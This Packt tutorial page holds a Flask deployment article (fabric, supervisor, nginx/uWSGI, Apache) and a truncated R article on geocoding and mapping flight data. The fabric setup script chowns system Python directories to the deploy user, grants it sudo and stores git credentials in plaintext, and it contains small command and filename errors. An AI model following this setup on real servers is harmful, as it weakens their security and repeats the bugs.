Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Events
Videos
Audiobooks
Packt Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7018 Articles
article-image-deploying-your-own-server
Packt
30 Sep 2015
16 min read
Save for later

Deploying on your own server

Packt
30 Sep 2015
16 min read
In this article by Jack Stouffer, the author of the book Mastering Flask, you will learn how to deploy and host your application on the different options available, and the advantages and disadvantages related to them. The most common way to deploy any web app is to run it on a server that you have control over. Control in this case means access to the terminal on the server with an administrator account. This type of deployment gives you the most amount of freedom out of the other choices as it allows you to install any program or tool you wish. This is in contrast to other hosting solutions where the web server and database are chosen for you. This type of deployment also happens to be the least expensive option. The downside to this freedom is that you take the responsibility of keeping the server up, backing up user data, keeping the software on the server up to date to avoid security issues, and so on. Entire books have been written on good server management, so if this is not a responsibility that you believe you or your company can handle, it would be best if you choose one of the other deployment options. This section will be based on a Debian Linux-based server, as Linux is far and away the most popular OS for running web servers, and Debian is the most popular Linux distro (a particular combination of software and the Linux kernel released as a package). Any OS with Bash and a program called SSH (which will be introduced in the next section) will work for this article, the only differences will be the command-line programs to install software on the server. (For more resources related to this topic, see here.) Each of these web servers will use a protocol named Web Server Gateway Interface (WSGI), which is a standard designed to allow Python web applications to easily communicate with web servers. We will never directly work with WSGI. However, most of the web server interfaces we will be using will have WSGI in their name, and it can be confusing if you don't know what the name is. Pushing code to your server with fabric To automate the process of setting up and pushing our application code to the server, we will use a Python tool called fabric. Fabric is a command-line program that reads and executes Python scripts on remote servers using a tool called SSH. SSH is a protocol that allows a user of one computer to remotely log in to another computer and execute commands on the command line, provided that the user has an account on the remote machine. To install fabric, we will use pip: $ pip install fabric Fabric commands are collections of command-line programs to be run on the remote machine's shell, in this case, Bash. We are going to make three different commands: one to run our unit tests, one to set up a brand new server to our specifications, and one to have the server update its copy of the application code with git. We will store these commands in a new file at the root of our project directory called fabfile.py. As it's the easiest to create, let's make the test command first: from fabric.api import local def test(): local('python -m unittest discover') To run this function from the command line, we can use fabric's command-line interface by passing the name of the command to run: $ fab test [localhost] local: python -m unittest discover ..... --------------------------------------------------------------------- Ran 5 tests in 6.028s OK Fabric has three main commands: local, run, and sudo. The local function, as seen in the preceding function, runs commands on the local computer. The run and sudo functions run commands on a remote machine, but sudo runs commands as an administrator. All of these functions notify fabric if the command ran successfully or not. If a command didn't run successfully, meaning that our tests failed in this case, any other commands in the function will not be run. This is useful for our commands because it allows us to force ourselves not to push any code to the server that does not pass our tests. Now we need to create the command to set up a new server from scratch. What this command will do is install the software our production environment needs as well as downloads the code from our centralized git repository. It will also create a new user that will act as the runner of the web server as well as the owner of the code repository. Do not run your webserver or have your code deployed by the root user. This opens your application to a whole host of security vulnerabilities. This command will differ based on your operating system, and we will be adding to this command in the rest of the article based on what server you choose: from fabric.api import env, local, run, sudo, cd env.hosts = ['deploy@[your IP]'] def upgrade_libs(): sudo("apt-get update") sudo("apt-get upgrade") def setup(): test() upgrade_libs() # necessary to install many Python libraries sudo("apt-get install -y build-essential") sudo("apt-get install -y git") sudo("apt-get install -y python") sudo("apt-get install -y python-pip") # necessary to install many Python libraries sudo("apt-get install -y python-all-dev") run("useradd -d /home/deploy/ deploy") run("gpasswd -a deploy sudo") # allows Python packages to be installed by the deploy user sudo("chown -R deploy /usr/local/") sudo("chown -R deploy /usr/lib/python2.7/") run("git config --global credential.helper store") with cd("/home/deploy/"): run("git clone [your repo URL]") with cd('/home/deploy/webapp'): run("pip install -r requirements.txt") run("python manage.py createdb") There are two new fabric features in this script. One is the env.hosts assignment, which tells fabric the user and IP address of the machine it should be logging in to. Second, there is the cd function used in conjunction with the with keyword, which executes any functions in the context of that directory instead of the home directory of the deploy user. The line that modifies the git configuration is there to tell git to remember your repository's username and password, so you do not have to enter it every time you wish to push code to the server. Also, before the server is set up, we make sure to update the server's software to keep the server up to date. Finally, we have the function to push our new code to the server. In time, this command will also restart the web server and reload any configuration files that come from our code. But this depends on the server you choose, so this is filled out in the subsequent sections: def deploy(): test() upgrade_libs() with cd('/home/deploy/webapp'): run("git pull") run("pip install -r requirements.txt") So, if we were to begin working on a new server, all we would need to do to set it up is to run the following commands: $ fabric setup $ fabric deploy Running your web server with supervisor Now that we have automated our updating process, we need some program on the server to make sure that our web server, and database if you aren't using SQLite, is running. To do this, we will use a simple program called supervisor. All that supervisor does is automatically run command-line programs in background processes and allows you to see the status of running programs. Supervisor also monitors all of the processes its running, and if the process dies, it tries to restart it. To install supervisor, we need to add it to the setup command in our fabfile.py: def setup(): … sudo("apt-get install -y supervisor") To tell supervisor what to do, we need to create a configuration file and then copy it to the /etc/supervisor/conf.d/ directory of our server during the deploy fabric command. Supervisor will load all of the files in this directory when it starts and attempt to run them. In a new file in the root of our project directory named supervisor.conf, add the following: [program:webapp] command= directory=/home/deploy/webapp user=deploy [program:rabbitmq] command=rabbitmq-server user=deploy [program:celery] command=celery worker -A celery_runner directory=/home/deploy/webapp user=deploy This is the bare minimum configuration needed to get a web server up and running. But, supervisor has a lot more configuration options. To view all of the customizations, go to the supervisor documentation at http://supervisord.org/. This configuration tells supervisor to run a command in the context of /home/deploy/webapp under the deploy user. The right hand of the command value is empty because it depends on what server you are running and will be filled in for each section. Now we need to add a sudo call in the deploy command to copy this configuration file to the /etc/supervisor/conf.d/ directory: def deploy(): … with cd('/home/deploy/webapp'): … sudo("cp supervisord.conf /etc/supervisor/conf.d/webapp.conf") sudo('service supervisor restart') A lot of projects just create the files on the server and forget about them, but having the configuration file stored in our git repository and copied on every deployment gives several advantages. First, this means that it easy to revert changes if something goes wrong using git. Second, it means that we don't have to log in to our server in order to make changes to the files. Don't use the Flask development server in production. Not only it fails to handle concurrent connections, but it also allows arbitrary Python code to be run on your server. Gevent The simplest option to get a web server up and running is to use a Python library called gevent to host your application. Gevent is a Python library that adds an alternative way of doing concurrent programming outside of the Python threading library called coroutines. Gevent has an interface for running WSGI applications that is both simple and has good performance. A simple gevent server can easily handle hundreds of concurrent users, which is more in number than 99 percent of websites on the Internet will ever have. The downside to this option is that its simplicity means a lack of configuration options. There is no way, for example, to add rate limiting to the server or to add HTTPS traffic. This deployment option is purely for sites that you don't expect to receive a huge amount of traffic. Remember YAGNI (short for You Aren't Gonna Need It); only upgrade to a different web server if you really need to. Coroutines are a bit outside of the scope of this book, so a good explanation can be found at https://en.wikipedia.org/wiki/Coroutine. To install gevent, we will use pip: $ pip install gevent In a new file in the root of the project directory named gserver.py, add the following: from gevent.wsgi import WSGIServer from webapp import create_app app = create_app('webapp.config.ProdConfig') server = WSGIServer(('', 80), app) server.serve_forever() To run the server with supervisor, just change the command value to the following: [program:webapp] command=python gserver.py directory=/home/deploy/webapp user=deploy Now when you deploy, gevent will be automatically installed for you by running your requirements.txt on every deployment, that is, if you are properly pip freeze–ing after every new dependency is added. Tornado Tornado is another very simple way to deploy WSGI apps purely with Python. Tornado is a web server that is designed to handle thousands of simultaneous connections. If your application needs real-time data, Tornado also supports websockets for continuous, long-lived connections to the server. Do not use Tornado in production on a Windows server. The Windows version of Tornado is not only much slower, but it is considered beta quality software. To use Tornado with our application, we will use Tornado's WSGIContainer in order to wrap the application object to make it Tornado compatible. Then, Tornado will start to listen on port 80 for requests until the process is terminated. In a new file named tserver.py, add the following: from tornado.wsgi import WSGIContainer from tornado.httpserver import HTTPServer from tornado.ioloop import IOLoop from webapp import create_app app = WSGIContainer(create_app("webapp.config.ProdConfig")) http_server = HTTPServer(app) http_server.listen(80) IOLoop.instance().start() To run the Tornado with supervisor, just change the command value to the following: [program:webapp] command=python tserver.py directory=/home/deploy/webapp user=deploy Nginx and uWSGI If you need more performance or customization, the most popular way to deploy a Python web application is to use the web server Nginx as a frontend for the WSGI server uWSGI by using a reverse proxy. A reverse proxy is a program in networks that retrieves contents for a client from a server as if they returned from the proxy itself as shown in the following figure: Nginx and uWSGI are used in this way because we get the power of the Nginx frontend while having the customization of uWSGI. Nginx is a very powerful web server that became popular by providing the best combination of speed and customization. Nginx is consistently faster than other web severs, such as Apache httpd, and has native support for WSGI applications. The way it achieves this speed is several good architecture decisions as well as the decision early on that they were not going to try to cover a large amount of use cases like Apache does. Having a smaller feature set makes it much easier to maintain and optimize the code. From a programmer's perspective, it is also much easier to configure Nginx, as there is no giant default configuration file (httpd.conf) that needs to be overridden with .htaccess files in each of your project directories. One downside is that Nginx has a much smaller community than Apache, so if you have an obscure problem, you are less likely to be able to find answers online. Also, it's possible that a feature that most programmers are used to in Apache isn't supported in Nginx. uWSGI is a web server that supports several different types of server interfaces, including WSGI. uWSGI handles severing the application content as well as things such as load balancing traffic across several different processes and threads. To install uWSGI, we will use pip in the following way: $ pip install uwsgi In order to run our application, uWSGI needs a file with an accessible WSGI application. In a new file named wsgi.py in the top level of the project directory, add the following: from webapp import create_app app = create_app("webapp.config.ProdConfig") To test uWSGI, we can run it from the command line with the following: $ uwsgi --socket 127.0.0.1:8080 --wsgi-file wsgi.py --callable app --processes 4 --threads 2 If you are running this on your server, you should be able to access port 8080 and see your app (if you don't have a firewall that is). What this command does is load the app object from the wsgi.py file and makes it accessible from localhost on port 8080. It also spawns four different processes with two threads each, which are automatically load balanced by a master process. This amount of processes is the overkill for the vast, vast majority of websites. To start off, use a single process with two threads and scale up from there. Instead of adding all of the configuration options on the command line, we can create a text file to hold our configuration, which brings the same benefits for configuration that were listed in the section on supervisor. In a new file in the root of the project directory named uwsgi.ini, add the following: [uwsgi] socket = 127.0.0.1:8080 wsgi-file = wsgi.py callable = app processes = 4 threads = 2 uWSGI supports hundreds of configuration options as well as several official and unofficial plugins. To leverage the full power of uWSGI, you can explore the documentation at http://uwsgi-docs.readthedocs.org/. Let's run the server now from supervisor: [program:webapp] command=uwsgi uwsgi.ini directory=/home/deploy/webapp user=deploy We also need to install Nginx during the setup function: def setup(): … sudo("apt-get install -y nginx") Because we are installing Nginx from the OS's package manager, the OS will handle running Nginx for us. At the time of writing, the Nginx version in the official Debian package manager is several years old. To install the most recent version, follow the instructions here: http://wiki.nginx.org/Install. Next, we need to create an Nginx configuration file and then copy it to the /etc/nginx/sites-available/ directory when we push the code. In a new file in the root of the project directory named nginx.conf, add the following server { listen 80; server_name your_domain_name; location / { include uwsgi_params; uwsgi_pass 127.0.0.1:8080; } location /static { alias /home/deploy/webapp/webapp/static; } } What this configuration file does is tell Nginx to listen for incoming requests on port 80 and forward all requests to the WSGI application that is listening on port 8080. Also, it makes an exception for any requests for static files and instead sends those requests directly to the file system. Bypassing uWSGI for static files gives a great performance boost, as Nginx is really good at serving static files quickly. Finally, in the fabfile.py file: def deploy(): … with cd('/home/deploy/webapp'): … sudo("cp nginx.conf " "/etc/nginx/sites-available/[your_domain]") sudo("ln -sf /etc/nginx/sites-available/your_domain " "/etc/nginx/sites-enabled/[your_domain]") sudo("service nginx restart") Apache and uWSGI Using Apache httpd with uWSGI has mostly the same setup. First off, we need an apache configuration file in a new file in the root of our project directory named apache.conf: <VirtualHost *:80> <Location /> ProxyPass / uwsgi://127.0.0.1:8080/ </Location> </VirtualHost> This file just tells Apache to pass all requests on port 80 to the uWSGI web server listening on port 8080. But, this functionality requires an extra Apache plugin from uWSGI called mod proxy uWSGI. We can install this as well as Apache in the set command: def setup(): … sudo("apt-get install -y apache2") sudo("apt-get install -y libapache2-mod-proxy-uwsgi") Finally, in the deploy command, we need to copy our Apache configuration file into Apache's configuration directory. def deploy(): … with cd('/home/deploy/webapp'): … sudo("cp apache.conf " "/etc/apache2/sites-available/[your_domain]") sudo("ln -sf /etc/apache2/sites-available/[your_domain] " "/etc/apache2/sites-enabled/[your_domain]") sudo("service apache2 restart") Summary In this article you learnt that there are many different options to hosting your application, each having their own pros and cons. Deciding on one depends on the amount of time and money you are willing to spend as well as the total number of users you expect. Resources for Article: Further resources on this subject: Handling sessions and users[article] Snap – The Code Snippet Sharing Application[article] Man, Do I Like Templates! [article] from fabric.api import local def test():     local('python -m unittest discover')
Read more
  • 0
  • 0
  • 9985

article-image-data-around-us
Packt
29 Sep 2015
25 min read
Save for later

Data Around Us

Packt
29 Sep 2015
25 min read
In this article by Gergely Daróczi, author of the book Mastering Data Analysis with R we will discuss Spatial data, also known as geospatial data, which identifies geographic locations, such as natural or constructed features around us. Although all observations have some spatial content, such as the location of the observation, but this is out of most data analysis tools' range due to the complex nature of spatial information; alternatively, the spatiality might not be that interesting (at first sight) in the given research topic. On the other hand, analyzing spatial data can reveal some very important underlying structures of the data, and it is well worth spending time visualizing the differences and similarities between close or far data points. In this article, we are going to help with this and will use a variety of R packages to: Retrieve geospatial information from the Internet Visualize points and polygons on a map (For more resources related to this topic, see here.) Geocoding We will use the hflights dataset to demonstrate how one can deal with data bearing spatial information. To this end, let's aggregate our dataset but instead of generating daily data let's view the aggregated characteristics of the airports. For the sake of performance, we will use the data.table package: > library(hflights) > library(data.table) > dt <- data.table(hflights)[, list( + N = .N, + Cancelled = sum(Cancelled), + Distance = Distance[1], + TimeVar = sd(ActualElapsedTime, na.rm = TRUE), + ArrDelay = mean(ArrDelay, na.rm = TRUE)) , by = Dest] So we have loaded and then immediately transformed the hlfights dataset to a data.table object. At the same time, we aggregated by the destination of the flights to compute: The number of rows The number of cancelled flights The distance The standard deviation of the elapsed time of the flights The arithmetic mean of the delays The resulting R object looks like this: > str(dt) Classes 'data.table' and 'data.frame': 116 obs. of 6 variables: $ Dest : chr "DFW" "MIA" "SEA" "JFK" ... $ N : int 6653 2463 2615 695 402 6823 4893 5022 6064 ... $ Cancelled: int 153 24 4 18 1 40 40 27 33 28 ... $ Distance : int 224 964 1874 1428 3904 305 191 140 1379 862 ... $ TimeVar : num 10 12.4 16.5 19.2 15.3 ... $ ArrDelay : num 5.961 0.649 9.652 9.859 10.927 ... - attr(*, ".internal.selfref")=<externalptr> So we have 116 observations all around the world and five variables describing those. Although this seems to be a spatial dataset, we have no geospatial identifiers that a computer can understand per se, so let's fetch the geocodes of these airports from the Google Maps API via the ggmap package. First, let's see how it works when we are looking for the geo-coordinates of Houston: > library(ggmap) > (h <- geocode('Houston, TX')) Information from URL : http://maps.googleapis.com/maps/api/geocode/json?address=Houston,+TX&sensor=false lon lat 1 -95.3698 29.76043 So the geocode function can return the matched latitude and longitude of the string we sent to Google. Now let's do the very same thing for all flight destinations: > dt[, c('lon', 'lat') := geocode(Dest)] Well, this took some time as we had to make 116 separate queries to the Google Maps API. Please note that Google limits you to 2,500 queries a day without authentication, so do not run this on a large dataset. There is a helper function in the package, called geocodeQueryCheck, which can be used to check the remaining number of free queries for the day. Some of the methods and functions we plan to use in some later sections of this article do not support data.table, so let's fall back to the traditional data.frame format and also print the structure of the current object: > str(setDF(dt)) 'data.frame': 116 obs. of 8 variables: $ Dest : chr "DFW" "MIA" "SEA" "JFK" ... $ N : int 6653 2463 2615 695 402 6823 4893 5022 6064 ... $ Cancelled: int 153 24 4 18 1 40 40 27 33 28 ... $ Distance : int 224 964 1874 1428 3904 305 191 140 1379 862 ... $ TimeVar : num 10 12.4 16.5 19.2 15.3 ... $ ArrDelay : num 5.961 0.649 9.652 9.859 10.927 ... $ lon : num -97 136.5 -122.3 -73.8 -157.9 ... $ lat : num 32.9 34.7 47.5 40.6 21.3 ... This was pretty quick and easy, wasn't it? Now that we have the longitude and latitude values of all the airports, we can try to show these points on a map. Visualizing point data in space For the first time, let's keep it simple and load some package-bundled polygons as the base map. To this end, we will use the maps package. After loading it, we use the map function to render the polygons of the United States of America, add a title, and then some points for the airports and also for Houston with a slightly modified symbol: > library(maps) > map('state') > title('Flight destinations from Houston,TX') > points(h$lon, h$lat, col = 'blue', pch = 13) > points(dt$lon, dt$lat, col = 'red', pch = 19) And showing the airport names on the plot is pretty easy as well: we can use the well-known functions from the base graphics package. Let's pass the three character names as labels to the text function with a slightly increased y value to shift the preceding text the previously rendered data points: > text(dt$lon, dt$lat + 1, labels = dt$Dest, cex = 0.7) Now we can also specify the color of the points to be rendered. This feature can be used to plot our first meaningful map to highlight the number of flights in 2011 to different parts of the USA: > map('state') > title('Frequent flight destinations from Houston,TX') > points(h$lon, h$lat, col = 'blue', pch = 13) > points(dt$lon, dt$lat, pch = 19, + col = rgb(1, 0, 0, dt$N / max(dt$N))) > legend('bottomright', legend = round(quantile(dt$N)), pch = 19, + col = rgb(1, 0, 0, quantile(dt$N) / max(dt$N)), box.col = NA) So the intensity of red shows the number of flights to the given points (airports); the values range from 1 to almost 10,000. Probably it would be more meaningful to compute these values on a state level, as there are many airports, very close to each other, that might be better aggregated at a higher administrative area level. To this end, we load the polygon of the states, match the points of interest (airports) with the overlaying polygons (states), and render the polygons as a thematic map instead of points, like we did on the previous pages. Finding polygon overlays of point data We already have all the data we need to identify the parent state of each airport. The dt dataset includes the geo-coordinates of the locations, and we managed to render the states as polygons with the map function. Actually, this latter function can return the underlying dataset without rendering a plot: > str(map_data <- map('state', plot = FALSE, fill = TRUE)) List of 4 $ x : num [1:15599] -87.5 -87.5 -87.5 -87.5 -87.6 ... $ y : num [1:15599] 30.4 30.4 30.4 30.3 30.3 ... $ range: num [1:4] -124.7 -67 25.1 49.4 $ names: chr [1:63] "alabama" "arizona" "arkansas" "california" ... - attr(*, "class")= chr "map" So we have around 16,000 points describing the boundaries of the US states, but this map data is more detailed than we actually need (see for example the name of the polygons starting with Washington): > grep('^washington', map_data$names, value = TRUE) [1] "washington:san juan island" "washington:lopez island" [3] "washington:orcas island" "washington:whidbey island" [5] "washington:main" In short, the non-connecting parts of a state are defined as separate polygons. To this end, let's save a list of the state names without the string after the colon: > states <- sapply(strsplit(map_data$names, ':'), '[[', 1) We will use this list as the basis of aggregation from now on. Let's transform this map dataset into another class of object, so that we can use the powerful features of the sp package. We will use the maptools package to do this transformation: > library(maptools) > us <- map2SpatialPolygons(map_data, IDs = states, + proj4string = CRS("+proj=longlat +datum=WGS84")) An alternative way of getting the state polygons might be to directly load those instead of transforming from other data formats as described earlier. To this end, you may find the raster package especially useful to download free map shapefiles from gadm.org via the getData function. Although these maps are way too detailed for such a simple task, you can always simplify those—for example, with the gSimplify function of the rgeos package. So we have just created an object called us, which includes the polygons of map_data for each state with the given projection. This object can be shown on a map just like we did previously, although you should use the general plot method instead of the map function: > plot(us) Besides this, however, the sp package supports so many powerful features! For example, it's very easy to identify the overlay polygons of the provided points via the over function. As this function name conflicts with the one found in the grDevices package, it's better to refer to the function along with the namespace using a double colon: > library(sp) > dtp <- SpatialPointsDataFrame(dt[, c('lon', 'lat')], dt, + proj4string = CRS("+proj=longlat +datum=WGS84")) > str(sp::over(us, dtp)) 'data.frame': 49 obs. of 8 variables: $ Dest : chr "BHM" "PHX" "XNA" "LAX" ... $ N : int 2736 5096 1172 6064 164 NA NA 2699 3085 7886 ... $ Cancelled: int 39 29 34 33 1 NA NA 35 11 141 ... $ Distance : int 562 1009 438 1379 926 NA NA 1208 787 689 ... $ TimeVar : num 10.1 13.61 9.47 15.16 13.82 ... $ ArrDelay : num 8.696 2.166 6.896 8.321 -0.451 ... $ lon : num -86.8 -112.1 -94.3 -118.4 -107.9 ... $ lat : num 33.6 33.4 36.3 33.9 38.5 ... What happened here? First, we passed the coordinates and the whole dataset to the SpatialPointsDataFrame function, which stored our data as spatial points with the given longitude and latitude values. Next we called the over function to left-join the values of dtp to the US states. An alternative way of identifying the state of a given airport is to ask for more detailed information from the Google Maps API. By changing the default output argument of the geocode function, we can get all address components for the matched spatial object, which of course includes the state as well. Look for example at the following code snippet: geocode('LAX','all')$results[[1]]$address_components Based on this, you might want to get a similar output for all airports and filter the list for the short name of the state. The rlist package would be extremely useful in this task, as it offers some very convenient ways of manipulating lists in R. The only problem here is that we matched only one airport to the states, which is definitely not okay. See for example the fourth column in the earlier output: it shows LAX as the matched airport for California (returned by states[4]), although there are many others there as well. To overcome this issue, we can do at least two things. First, we can use the returnList argument of the over function to return all matched rows of dtp, and we will then post-process that data: > str(sapply(sp::over(us, dtp, returnList = TRUE), + function(x) sum(x$Cancelled))) Named int [1:49] 51 44 34 97 23 0 0 35 66 149 ... - attr(*, "names")= chr [1:49] "alabama" "arizona" "arkansas" ... So we created and called an anonymous function that will sum up the Cancelled values of the data.frame in each element of the list returned by over. Another, probably cleaner, approach is to redefine dtp to only include the related values and pass a function to over to do the summary: > dtp <- SpatialPointsDataFrame(dt[, c('lon', 'lat')], + dt[, 'Cancelled', drop = FALSE], + proj4string = CRS("+proj=longlat +datum=WGS84")) > str(cancels <- sp::over(us, dtp, fn = sum)) 'data.frame': 49 obs. of 1 variable: $ Cancelled: int 51 44 34 97 23 NA NA 35 66 149 ... Either way, we have a vector to merge back to the US state names: > val <- cancels$Cancelled[match(states, row.names(cancels))] And to update all missing values to zero (as the number of cancelled flights in a state without any airport is not missing data, but exactly zero for sure): > val[is.na(val)] <- 0 Plotting thematic maps Now we have everything to create our first thematic map. Let's pass the val vector to the previously used map function (or plot it using the us object), specify a plot title, add a blue point for Houston, and then create a legend, which shows the quantiles of the overall number of cancelled flights as a reference: > map("state", col = rgb(1, 0, 0, sqrt(val/max(val))), fill = TRUE) > title('Number of cancelled flights from Houston to US states') > points(h$lon, h$lat, col = 'blue', pch = 13) > legend('bottomright', legend = round(quantile(val)), + fill = rgb(1, 0, 0, sqrt(quantile(val)/max(val))), box.col = NA) Please note that, instead of a linear scale, we decided to compute the square root of the relative values to define the intensity of the fill color, so that we can visually highlight the differences between the states. This was necessary as most flight cancellations happened in Texas (748), and there were no more than 150 cancelled flights in any other state (with the average being around 45). You can also easily load ESRI shape files or other geospatial vector data formats into R as points or polygons with a bunch of packages already discussed and a few others as well, such as the maptools, rgdal, dismo, raster, or shapefile packages. Another, probably easier, way to generate country-level thematic maps, especially choropleth maps, is to load the rworldmap package made by Andy South, and rely on the convenient mapCountryData function. Rendering polygons around points Besides thematic maps, another really useful way of presenting spatial data is to draw artificial polygons around the data points based on the data values. This is especially useful if there is no available polygon shape file to be used to generate a thematic map. A level plot, contour plot, or isopleths, might be an already familiar design from tourist maps, where the altitude of the mountains is represented by a line drawn around the center of the hill at the very same levels. This is a very smart approach having maps present the height of hills—projecting this third dimension onto a 2-dimensional image. Now let's try to replicate this design by considering our data points as mountains on the otherwise flat map. We already know the heights and exact geo-coordinates of the geometric centers of these hills (airports); the only challenge here is to draw the actual shape of these objects. In other words: Are these mountains connected? How steep are the hillsides? Should we consider any underlying spatial effects in the data? In other words, can we actually render these as mountains with a 3D shape instead of plotting independent points in space? If the answer for the last question is positive, then we can start trying to answer the other questions by fine-tuning the plot parameters. For now, let's simply suppose that there is a spatial effect in the underlying data, and it makes sense to visualize the data in such a way. Later, we will have the chance to disprove or support this statement either by analyzing the generated plots, or by building some geo-spatial models—some of these will be discussed later, in the Spatial Statistics section. Contour lines First, let's expand our data points into a matrix with the fields package. The size of the resulting R object is defined arbitrarily but, for the given number of rows and columns, which should be a lot higher to generate higher resolution images, 256 is a good start: > library(fields) > out <- as.image(dt$ArrDelay, x = dt[, c('lon', 'lat')], + nrow = 256, ncol = 256) The as.image function generates a special R object, which in short includes a 3‑dimensional matrix-like data structure, where the x and y axes represent the longitude and latitude ranges of the original data respectively. To simplify this even more, we have a matrix with 256 rows and 256 columns, where each of those represents a discrete value evenly distributed between the lowest and highest values of the latitude and longitude. And on the z axis, we have the ArrDelay values—which are in most cases of course missing: > table(is.na(out$z)) FALSE TRUE 112 65424 What does this matrix look like? It's better to see what we have at the moment: > image(out) Well, this does not seem to be useful at all. What is shown there? We rendered the x and y dimensions of the matrix with z colors here, and most tiles of this map are empty due to the high amount of missing values in z. Also, it's pretty straightforward now that the dataset included many airports outside the USA as well. How does it look if we focus only on the USA? > image(out, xlim = base::range(map_data$x, na.rm = TRUE), + ylim = base::range(map_data$y, na.rm = TRUE)) An alternative and more elegant approach to rendering only the US part of the matrix would be to drop the non-US airports from the database before actually creating the out R object. Although we will continue with this example for didactic purposes, with real data make sure you concentrate on the target subset of your data instead of trying to smooth and model unrelated data points as well. A lot better! So we have our data points as a tile, now let's try to identify the slope of these mountain peaks, to be able to render them on a future map. This can be done by smoothing the matrix: > look <- image.smooth(out, theta = .5) > table(is.na(look$z)) FALSE TRUE 14470 51066 As can be seen in the preceding table, this algorithm successfully eliminated many missing values from the matrix. The image.smooth function basically reused our initial data point values in the neighboring tiles, and computed some kind of average for the conflicting overrides. This smoothing algorithm results in the following arbitrary map, which does not respect any political or geographical boundaries: > image(look) It would be really nice to plot these artificial polygons along with the administrative boundaries, so let's clear out all cells that do not belong to the territory of the USA. We will use the point.in.polygon function from the sp package to do so: > usa_data <- map('usa', plot = FALSE, region = 'main') > p <- expand.grid(look$x, look$y) > library(sp) > n <- which(point.in.polygon(p$Var1, p$Var2, + usa_data$x, usa_data$y) == 0) > look$z[n] <- NA In a nutshell, we have loaded the main polygon of the USA without any sub-administrative areas, and verified our cells in the look object, if those are overlapping the polygon. Then we simply reset the value of the cell, if not. The next step is to render the boundaries of the USA, plot our smoothed contour plot, then add some eye-candy in the means of the US states and, the main point of interest, the airport: > map("usa") > image(look, add = TRUE) > map("state", lwd = 3, add = TRUE) > title('Arrival delays of flights from Houston') > points(dt$lon, dt$lat, pch = 19, cex = .5) > points(h$lon, h$lat, pch = 13) Now this is pretty neat, isn't it? Voronoi diagrams An alternative way of visualizing point data with polygons is to generate Voronoi cells between them. In short, the Voronoi map partitions the space into regions around the data points by aligning all parts of the map to one of the regions to minimize the distance from the central data points. This is extremely easy to interpret, and also to implement in R. The deldir package provides a function with the very same name for Delaunay triangulation: > library(deldir) > map("usa") > plot(deldir(dt$lon, dt$lat), wlines = "tess", lwd = 2, + pch = 19, col = c('red', 'darkgray'), add = TRUE) Here, we represented the airports with red dots, as we did before, but also added the Dirichlet tessellation (Voronoi cells) rendered as dark-gray dashed lines. For more options on how to fine-tune the results, see the plot.deldir method. In the next section, let's see how to improve this plot by adding a more detailed background map to it. Satellite maps There are many R packages on CRAN that can fetch data from Google Maps, Stamen, Bing, or OpenStreetMap—even some of the packages we previously used in this article, like the ggmap package, can do this. Similarly, the dismo package also comes with both geo-coding and Google Maps API integration capabilities, and there are some other packages focused on that latter, such as the RgoogleMaps package. Now we will use the OpenStreetMap package, mainly because it supports not only the awesome OpenStreetMap database back-end, but also a bunch of other formats as well. For example, we can render really nice terrain maps via Stamen: > library(OpenStreetMap) > map <- openmap(c(max(map_data$y, na.rm = TRUE), + min(map_data$x, na.rm = TRUE)), + c(min(map_data$y, na.rm = TRUE), + max(map_data$x, na.rm = TRUE)), + type = 'stamen-terrain') So we defined the left upper and right lower corners of the map we need, and also specified the map style to be a satellite map. As the data by default arrives from the remote servers with the Mercator projections, we first have to transform that to WGS84 (we used this previously), so that we can render the points and polygons on the top of the fetched map: > map <- openproj(map, + projection = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs') And Showtime at last: > plot(map) > plot(deldir(dt$lon, dt$lat), wlines = "tess", lwd = 2, + col = c('red', 'black'), pch = 19, cex = 0.5, add = TRUE) This seems to be a lot better compared to the outline map we created previously. Now you can try some other map styles as well, such as mapquest-aerial, or some of the really nice-looking cloudMade designs. Interactive maps Besides being able to use Web-services to download map tiles for the background of the maps created in R, we can also rely on some of those to generate truly interactive maps. One of the best known related services is the Google Visualization API, which provides a platform for hosting visualizations made by the community; you can also use it to share maps you've created with others. Querying Google Maps In R, you can access this API via the googleVis package written and maintained by Markus Gesmann and Diego de Castillo. Most functions of the package generate HTML and JavaScript code that we can directly view in a Web browser as an SVG object with the base plot function; alternatively, we can integrate them in a Web page, for example via the IFRAME HTML tag. The gvisIntensityMap function takes a data.frame with country ISO or USA state codes and the actual data to create a simple intensity map. We will use the cancels dataset we created in the Finding Polygon Overlays of Point Data section but, before that, we have to do some data transformations. Let's add the state name as a new column to the data.frame, and replace the missing values with zero: > cancels$state <- rownames(cancels) > cancels$Cancelled[is.na(cancels$Cancelled)] <- 0 Now it's time to load the package and pass the data along with a few extra parameters, signifying that we want to generate a state-level US map: > library(googleVis) > plot(gvisGeoChart(cancels, 'state', 'Cancelled', + options = list( + region = 'US', + displayMode = 'regions', + resolution = 'provinces'))) The package also offers opportunities to query the Google Map API via the gvisMap function. We will use this feature to render the airports from the dt dataset as points on a Google Map with an auto-generated tooltip of the variables. But first, as usual, we have to do some data transformations again. The location argument of the gvisMap function takes the latitude and longitude values separated by a colon: > dt$LatLong <- paste(dt$lat, dt$lon, sep = ':') We also have to generate the tooltips as a new variable, which can be done easily with an apply call. We will concatenate the variable names and actual values separated by a HTML line break: > dt$tip <- apply(dt, 1, function(x) + paste(names(dt), x, collapse = '<br/ >')) And now we just pass these arguments to the function for an instant interactive map: > plot(gvisMap(dt, 'LatLong', tipvar = 'tip')) Another nifty feature of the googleVis package is that you can easily merge the different visualizations into one by using the gvisMerge function. The use of this function is quite simple: specify any two gvis objects you want to merge, and also whether they are to be placed horizontally or vertically. JavaScript mapping libraries The great success of the trending JavaScript data visualization libraries is only partly due to their great design. I suspect other factors also contribute to the general spread of such tools: it's very easy to create and deploy full-blown data models, especially since the release and on-going development of Mike Bostock's D3.js. Although there are also many really useful and smart R packages to interact directly with D3 and topojson (see for example my R user activity compilation at http://bit.ly/countRies). Now we will only focus on how to use Leaflet— probably the most used JavaScript library for interactive maps. What I truly love in R is that there are many packages wrapping other tools, so that R users can rely on only one programming language, and we can easily use C++ programs and Hadoop MapReduce jobs or build JavaScript-powered dashboards without actually knowing anything about the underlying technology. This is especially true when it comes to Leaflet! There are at least two very nice packages that can generate a Leaflet plot from the R console, without a single line of JavaScript. The Leaflet reference class of the 